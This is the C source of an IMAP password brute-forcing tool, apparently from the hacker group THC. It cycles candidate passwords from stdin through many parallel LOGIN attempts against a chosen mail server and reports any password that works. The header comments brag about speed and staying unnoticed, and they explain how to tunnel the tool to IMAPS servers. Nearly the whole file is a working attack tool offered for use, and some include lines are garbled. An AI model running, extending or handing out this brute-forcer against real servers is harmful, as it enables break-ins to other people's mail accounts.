/* * IMAP bruter. Coded this in a hurry. hydra was to slow (and sucked 100% cpu). * I had this one running with 30 passwords / second (100 parallel connections) * against a single server and it did not even appear in top. * * Visit us -- your enemies already did. * http://www.thc.org - THE HACKERS CHOICE * * gcc -Wall -O2 -g -o imap_bruter imap_bruter.c * * SSL support for dummies: * stunnel -c -d -f -r imap.theirdomain.com:993 * * Example: (Brute 40 in parallel) * ./imap_bruter -r -l carol -n 60 #include #include #include #include #include #include #include #include #include #include #include #include struct peer_str { char password[64]; char buf[256]; int sox; int read; char flags; time_t time; }; #define FL_CONNECTED (0x01) #define FL_HEADERREAD (0x02) #define ERREXIT(a...) do { \ fprintf(stderr, "%s:%d ", __func__, __LINE__); \ fprintf(stderr, a); \ exit(-1); \ } while (0) static char g_flags; #define FL_FINISHED (0x04) /* wordlist finished */ static unsigned short g_port; static unsigned int g_ip; static char *g_login; static unsigned int g_parallel; time_t time_now; static fd_set g_rfds, g_wfds; static unsigned int cracks; static char *g_passwd; static int n_peers; struct peer_str peers[1024]; static unsigned int hostname(char *host) { struct hostent *he; int ip; if ( (ip = inet_addr(host)) != -1) return ip; if ( (he = gethostbyname(host)) == NULL) return -1; if (he->h_length != 4) return -1; return *(int *)he->h_addr; } int tcp_socket_connect(unsigned int ip, unsigned short port) { int fd; struct sockaddr_in addr; int i; if ((fd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) return -1; memset(&addr, 0, sizeof addr); addr.sin_family = PF_INET; addr.sin_addr.s_addr = ip; addr.sin_port = port; if (connect(fd, (struct sockaddr *)&addr, sizeof addr) != 0) { close(fd); return -1; } i = i; setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &i, sizeof i); fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK); return fd; } static void usage(void) { fprintf(stderr, "" "imap-bruter [rlpn]\n" "Options:\n" " -r - Server imapd runs on. [default:]\n" " -p - Port imapd runs on. [default: 143]\n" " -l - Login name\n" " -n - Number of parallel connections.\n" "Passwords are read from stdin. Stunnel can be used if IMAPS is in place.\n" ""); exit(0); } static void do_getopt(int argc, char *argv[]) { int c; g_port = 143; g_parallel = 5; while ((c = getopt(argc, argv, "r:l:p:n:")) != -1) { switch (c) { case 'r': g_ip = hostname(optarg); break; case 'l': g_login = strdup(optarg); break; case 'p': g_port = atoi(optarg); break; case 'n': g_parallel = atoi(optarg); break; default: usage(); break; } } if (g_ip == -1) { fprintf(stderr, "Unknown host!\n"); usage(); } if (!g_login) usage(); if (g_parallel <= 0) usage(); } static void peer_clear(struct peer_str *p) { if (p->sox >= 0) close(p->sox); p->sox = -1; p->read = 0; p->flags = 0; /* Keep 'password' as it has not yet been processed */ n_peers--; } static int do_readpwd(struct peer_str *p) { char *ptr; if (g_flags & FL_FINISHED) return -1; cracks++; memset(p->password, 0, sizeof p->password); if (fgets(p->password, sizeof p->password - 1, stdin) == NULL) return -1; g_passwd = p->password; ptr = strchr(p->password, '\n'); if (ptr) *ptr = '\0'; return 0; } /* * Socket ready for reading. Read line. */ void do_read(struct peer_str *p) { ssize_t n; char *ptr; char buf[1024]; n = read(p->sox, p->buf + p->read, sizeof p->buf - p->read - 1); if (n <= 0) goto err; p->read += n; if (p->read + 1 >= sizeof p->buf) goto err; p->buf[p->read] = '\0'; ptr = strchr(p->buf, '\n'); if (!ptr) return; p->time = time_now; if (p->flags & FL_HEADERREAD) { if (strstr(p->buf, " NO") == NULL) { printf("FOUND '%s'\n", p->password); exit(0); } if (do_readpwd(p) != 0) { g_flags |= FL_FINISHED; goto err; } } else { p->flags |= FL_HEADERREAD; if (p->password[0] == '\0') { if (do_readpwd(p) != 0) { g_flags |= FL_FINISHED; goto err; } } } snprintf(buf, sizeof buf, "1 login \"%.100s\" \"%.100s\"\r\n", g_login, p->password); n = strlen(buf); if (write(p->sox, buf, n) != n) { /* Write should not fail. Linux kernel always has 1024 write * buffer for us. */ goto err; } return; err: peer_clear(p); } static void peer_init(struct peer_str *p) { p->sox = -1; p->read = 0; } int main(int argc, char *argv[]) { struct timeval tv; int conn; int maxfd; struct peer_str *p; int i, n; int ret; socklen_t len; time_t time_last, time_start; unsigned int hours, min, sec; unsigned int old_cracks = 0; double cs; g_passwd = ""; do_getopt(argc, argv); time_now = time(NULL); time_start = time_now; time_last = time_now; printf("Bruting '%s' with %d in parallel\n", g_login, g_parallel); for (i = 0; i < g_parallel; i++) peer_init(&peers[i]); while (1) { tv.tv_sec = 1; tv.tv_usec = 0; FD_ZERO(&g_rfds); FD_ZERO(&g_wfds); conn = 0; maxfd = 0; for (i = 0; i < g_parallel; i++) { if (peers[i].sox >= 0) { if (peers[i].flags & FL_CONNECTED) FD_SET(peers[i].sox, &g_rfds); else FD_SET(peers[i].sox, &g_wfds); } else if ((conn < 5) && (!(g_flags & FL_FINISHED))) { peers[i].time = time_now; peers[i].sox = tcp_socket_connect(g_ip, htons(g_port)); if (peers[i].sox >= 0) FD_SET(peers[i].sox, &g_wfds); conn++; } if (peers[i].sox > maxfd) maxfd = peers[i].sox; } if (maxfd == 0) { fprintf(stderr, "Finished %u cracks after %lu sec.\n", cracks, time_now - time_start); exit(0); } n = select(maxfd + 1, &g_rfds, &g_wfds, NULL, &tv); time_now = time(NULL); if ((time_last < time_now) && (old_cracks != cracks)) { sec = time_now - time_start; hours = sec / 3600; min = (sec - hours * 3600) / 60; sec = sec % 60; cs = ((float)cracks) / ((float)(time_now - time_start)); fprintf(stderr, "[%u:%02u:%02u] total: %d with %d peers: '%s' (%1.03f c/s)\n", hours, min, sec, cracks, n_peers, g_passwd, cs); time_last = time_now; old_cracks = cracks; } for (i = 0; i < g_parallel; i++) { p = &peers[i]; if (p->sox < 0) continue; if (p->time + 30 < time_now) { fprintf(stderr, "TIMEOUT on socket...\n"); peer_clear(p); continue; } if (FD_ISSET(p->sox, &g_wfds)) { len = sizeof ret; ret = 0; if ((getsockopt(p->sox, SOL_SOCKET, SO_ERROR, &ret, &len) != 0) || (ret != 0)) peer_clear(p); else { p->flags |= FL_CONNECTED; n_peers++; } } else if (FD_ISSET(p->sox, &g_rfds)) { do_read(p); } } /* for through all peers.. */ } }